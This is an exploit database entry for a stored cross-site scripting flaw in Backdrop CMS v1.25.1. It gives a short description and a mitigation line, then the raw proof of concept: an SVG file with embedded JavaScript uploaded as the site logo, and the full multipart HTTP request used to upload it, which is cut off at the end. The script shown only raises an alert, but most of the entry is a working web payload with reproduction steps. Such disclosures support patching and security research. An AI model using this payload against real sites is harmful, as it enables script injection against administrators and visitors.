Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)

vendor:

Backdrop CMS

by:

Mirabbas Agalarov

7.5

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Backdrop CMS

Affected Version From: v1.25.1

Affected Version To: v1.25.1

Patch Exists: YES

Related CWE: CVE-XXXX-XXXX

CPE: a:backdrop_cms:backdrop_cms:1.25.1

Metasploit:

Other Scripts:

Platforms Tested: Linux

2023

Backdrop Cms v1.25.1 – Stored Cross-Site Scripting (XSS)

The vulnerability allows an attacker to inject malicious code that will be stored and executed in the context of the affected website. In this case, the vulnerability exists in the Backdrop CMS v1.25.1 version. The attacker can upload a specially crafted SVG file containing malicious JavaScript code. When the file is accessed, the code is executed, leading to a cross-site scripting attack.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Backdrop CMS. Additionally, input validation and output encoding should be implemented to prevent XSS attacks.

Source

Exploit-DB raw data:

#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
#Application: Backdrop Cms
#Version: v1.25.1
#Bugs:  Stored Xss
#Technology: PHP
#Vendor URL: https://backdropcms.org/
#Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 

2. Technical Details & POC
========================================

1. login to account
2. go to http://localhost/backdrop/?q=admin/config/system/site-information
3. upload svg file

"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
"""
4. go to svg file (http://localhost/backdrop/files/malas_2.svg)


Request

POST /backdrop/?q=admin/config/system/site-information HTTP/1.1
Host: localhost
Content-Length: 2116
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/backdrop/?q=admin/config/system/site-information
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E
Connection: close

------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_name"

My Backdrop Site
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_slogan"


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_mail"

admin@admin.com
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_logo_path"


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_favicon_upload]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_favicon_path"

core/misc/favicon.ico
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_frontpage"

home
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_403"


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_404"


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_build_id"

form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_token"

siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_id"

system_site_information_settings
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="op"

Save configuration
------WebKitForm